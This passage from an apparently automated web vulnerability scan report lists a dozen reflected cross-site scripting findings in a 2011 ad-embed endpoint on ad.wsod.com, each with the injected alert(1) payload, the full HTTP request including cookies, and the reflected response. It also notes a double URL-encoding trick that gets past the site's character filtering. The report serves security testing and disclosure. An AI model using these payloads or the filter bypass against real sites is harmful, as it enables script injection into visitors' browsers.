5.81. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610b1"-alert(1)-"b260c77153e was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/353.0.js.120x30/1303843030**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628610b1"-alert(1)-"b260c77153e&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.82. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8199f"-alert(1)-"f38ee686c59 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e38199f"-alert(1)-"f38ee686c59">
...[SNIP]...

5.83. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eba1a"-alert(1)-"c5e1d0c5d1a was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/353.0.js.120x30/1303843034**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQeba1a"-alert(1)-"c5e1d0c5d1a&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.84. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8 was submitted in the REST URL parameter 2. This input was echoed as c5ea9";alert(1)//3e6670df6b8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9%2522%253balert%25281%2529%252f%252f3e6670df6b8/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357c5ea9";alert(1)//3e6670df6b8/353.0.js.120x30/1303843052**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9
...[SNIP]...

5.85. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408 was submitted in the REST URL parameter 3. This input was echoed as 5e00b";alert(1)//abbd6d3e408 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b%2522%253balert%25281%2529%252f%252fabbd6d3e408/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x305e00b";alert(1)//abbd6d3e408/1303843054**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b78
...[SNIP]...

5.86. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46a78"-alert(1)-"a549992a4e6 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843026**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=2825348846a78"-alert(1)-"a549992a4e6&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.87. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf8a"-alert(1)-"17ee62d1a47 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:01 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
/ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843021**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G3cf8a"-alert(1)-"17ee62d1a47&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.88. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 983cb"-alert(1)-"b33569e6d27 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
rc="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843012**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!983cb"-alert(1)-"b33569e6d27&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3">
...[SNIP]...

5.89. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9476a"-alert(1)-"985f8e3db43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1797458628?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1684

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=1797458628&PG=INVSRQ&ASID=5a9d1d95557d4344b789fe7d2c3b33e3&9476a"-alert(1)-"985f8e3db43=1">
...[SNIP]...

5.90. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ad74"-alert(1)-"523f8ff21d1 was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
oto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1303843266**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=84798989ad74"-alert(1)-"523f8ff21d1&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.91. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77be7"-alert(1)-"86a6913ea5d was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/353.0.js.120x30/1303843294**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=203006015277be7"-alert(1)-"86a6913ea5d&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad">
...[SNIP]...

5.92. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79400"-alert(1)-"898301abb9 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/2030060152?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8479898&UIT=G&TargetID=28253488&AN=2030060152&PG=INVSRQ&ASID=5ce48c628db348bd86a7cea7290e54ad79400"-alert(1)-"898301abb9 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1391:835:0:0:40771:1303842976:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:41:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
